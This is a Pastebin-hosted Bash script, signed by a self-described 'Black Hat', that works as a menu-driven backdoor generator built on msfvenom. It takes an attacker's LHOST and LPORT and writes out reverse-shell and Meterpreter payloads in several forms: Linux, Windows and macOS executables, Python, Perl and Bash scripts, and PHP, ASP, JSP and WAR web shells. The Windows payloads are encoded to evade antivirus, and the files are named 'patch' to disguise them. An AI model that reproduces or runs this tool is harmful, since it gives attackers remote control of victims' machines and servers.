Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/bin/bash
- ############
- # FUNCAO 1 #
- ############
- # Apresentacao
- apresentacao()
- {
- clear
- printf " \e[1;92m.-\"\"\"\"-. \e[0m\n"
- printf " \e[1;92m/ \ \e[0m\n"
- printf " \e[1;77m \e[0m\e[1;92m/_ _\ \e[0m\n"
- printf "\e[1;77m \e[0m\e[1;92m// \ / \\ \e[0m\n"
- printf "\e[1;77m \e[0m\e[1;92m|\__\ /__/ \e[0m\n"
- printf "\e[1;77m \e[0m\e[1;92m\ || / \e[0m\n"
- printf "\e[1;77m \e[0m\e[1;92m\ / \e[0m\n"
- printf "\e[1;92m \e[0m \e[1;92m\ __ / \e[0m\n"
- printf " \e[1;92m'.__.' \e[0m\n\n"
- echo -e "\033[01;33m###################################\033[01;37m"
- echo -e "\033[01;32m Desenvolvido por DarProgrammer000\033[01;37m"
- echo -e "\033[31;5m Black Hat DarkProgrammer000\033[0m"
- echo -e "\033[01;33m##################################\033[01;37m"
- echo ""
- }
- ############
- # FUNCAO 2 #
- ############
- dados()
- {
- echo -e -n "\033[01;31m\n# LHOST: \033[01;37m"
- read lhost
- echo -e -n "\033[01;32m\n# LPORT: \033[01;37m"
- read lport
- echo -e "\033[01;35m\n-.-.-.-.-.-.-.-.-.-.- Loading -.-.-.-.-.-.-.-.-.-.-\033[01;37m"
- }
- msg()
- {
- # Mensagem
- echo -e "\033[32;5m\n*** Sucesso ***\033[0m"
- echo -e "\033[31;5m\n<< ENTER >>> \033[0m"
- read
- }
- binaries()
- {
- clear
- echo -e "\033[31;5m---------- BINARIES ---------- \033[0m"
- echo -e "\033[01;31m# [1] Linux \033[01;37m"
- echo -e "\033[01;32m# [2] Windows \033[01;37m"
- echo -e "\033[01;32m# [3] Windows (HTTPS) \033[01;37m"
- echo -e "\033[01;33m# [4] Mac \033[01;37m"
- echo -e -n "\033[01;34m\n- Opc.: \033[01;37m"
- read opc
- dados
- case $opc in
- 1) msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport -f elf > patch.elf;;
- 2) msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport -b "\x00" -e x86/shikata_ga_nai -f exe > patch.exe;;
- #2) msfvenom -p windows/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport -f exe > patch.exe;;
- 3) msfvenom -p windows/meterpreter/reverse_https LHOST=$lhost LPORT=$lport -e x86/shikata_ga_nai -i 20 -f exe > shell.exe;;
- 4) msfvenom -p osx/x86/shell_reverse_tcp LHOST=$lhost LPORT=$lport -f macho > patch.macho;;
- *) ;;
- esac
- msg
- }
- script()
- {
- clear
- echo -e "\033[31;5m---------- LINUX ---------- \033[0m"
- echo -e "\033[01;31m# [1] Python \033[01;37m"
- echo -e "\033[01;32m# [2] Perl \033[01;37m"
- echo -e "\033[01;33m# [3] Bash \033[01;37m"
- echo -e -n "\033[01;34m\n- Opc.: \033[01;37m"
- read opc
- dados
- case $opc in
- 1) msfvenom -p cmd/unix/reverse_python_ssl LHOST=$lhost LPORT=$lport -f raw > patch.py;;
- #1) msfvenom -p cmd/unix/reverse_python LHOST=$lhost LPORT=$lport -f raw > patch.py;;
- 2) msfvenom -p cmd/unix/reverse_perl_ssl LHOST=$lhost LPORT=$lport -f raw > patch.pl;;
- #2) msfvenom -p cmd/unix/reverse_perl LHOST=$lhost LPORT=$lport -f raw > patch.pl;;
- 3) msfvenom -p cmd/unix/reverse_bash LHOST=$lhost LPORT=$lport -f raw > patch.sh;;
- esac
- msg
- }
- web()
- {
- clear
- echo -e "\033[31;5m---------- WEB ---------- \033[0m"
- echo -e "\033[01;31m# [1] PHP \033[01;37m"
- echo -e "\033[01;32m# [2] ASP \033[01;37m"
- echo -e "\033[01;33m# [3] JSP \033[01;37m"
- echo -e "\033[01;34m# [4] WAR \033[01;37m"
- echo -e -n "\033[01;35m\n- Opc.: \033[01;37m"
- read opc
- dados
- case $opc in
- 1) msfvenom -p php/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport -f raw > patch.php;;
- # patch.php | pbcopy && echo '<?php ' | tr -d '\n' > patch.php && pbpaste >> patch.php;;
- 2) msfvenom -p windows/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport -f asp > patch.asp;;
- 3) msfvenom -p java/jsp_shell_reverse_tcp LHOST=$lhost LPORT=$lport -f raw > patch.jsp;;
- 4) msfvenom -p java/jsp_shell_reverse_tcp LHOST=$lhost LPORT=$lport -f war > patch.war;;
- esac
- msg
- }
- # Programa
- programa()
- {
- i=1
- while (( $i==1 ))
- do
- apresentacao
- echo -e "\033[01;37m---------- BACKDOOR (MSF VENOM) ---------- \033[01;37m"
- echo -e "\033[01;31m# [1] BINARIES \033[01;37m"
- echo -e "\033[01;32m# [2] SCRIPT \033[01;37m"
- echo -e "\033[01;33m# [3] WEB \033[01;37m"
- echo -e "\033[01;34m# [0] Sair\n \033[01;37m"
- echo -e -n "\033[01;35m- Opc.: \033[01;37m"
- read so
- if (( $so==1 ))
- then
- binaries
- elif (( $so==2 ))
- then
- script
- elif (( $so==3 ))
- then
- web
- elif (( $so==0 ))
- then
- break
- else
- continue
- fi
- done
- }
- # Execucao do programa
- programa
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement